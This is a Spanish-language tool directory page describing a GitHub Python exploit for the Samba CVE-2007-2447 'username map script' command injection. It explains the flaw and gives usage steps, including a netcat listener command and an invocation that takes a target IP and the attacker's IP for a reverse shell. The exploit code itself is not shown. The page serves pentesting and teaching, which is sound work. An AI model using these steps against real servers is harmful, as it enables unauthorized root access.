Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Samba CVE-2007-2447 Exploit | Kitploit
Herramientas/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Samba CVE-2007-2447 Exploit

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Samba CVE-2007-2447 Exploit (Username Map Script)

Este repositorio contiene un script de Python diseñado para automatizar la explotación de la vulnerabilidad CVE-2007-2447 en servidores Samba (versiones 3.0.20 a 3.0.25rc3). Esta herramienta ha sido desarrollada con fines exclusivamente educativos y para pruebas de penetración autorizadas.

📝 Descripción Técnico-Académica

La vulnerabilidad "Username Map Script" ocurre debido a la falta de sanitización en la entrada de nombres de usuario cuando la opción username map script está habilitada en la configuración de Samba. Al enviar un nombre de usuario que contiene metacaracteres de shell (como backticks ` o sub-shells $()), el servidor ejecuta dichos comandos con los privilegios del servicio (frecuentemente root).

🚀 Requisitos

  • Sistema Operativo: Kali Linux / Parrot OS (o cualquier Linux con smbclient instalado).
  • Lenguaje: Python 3.x.
  • Dependencias: smbclient (debe estar disponible en el PATH del sistema).
  • 🛠️ Instalación y Uso

    1. Clonar el repositorio:
      root@kitploit:~
      git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
      cd samba-exploit-cve-2007-2447
      
    2. Dar permisos de ejecución chmod +x exploit.py
    3. Preparar el Listener (Kali Linux) nc -lvnp 4444
    4. Ejecutar el exploit ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
    Descargar herramienta